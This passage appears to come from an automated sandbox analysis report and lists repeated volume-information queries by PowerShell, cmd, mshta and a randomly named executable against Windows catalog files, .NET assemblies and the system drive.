                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
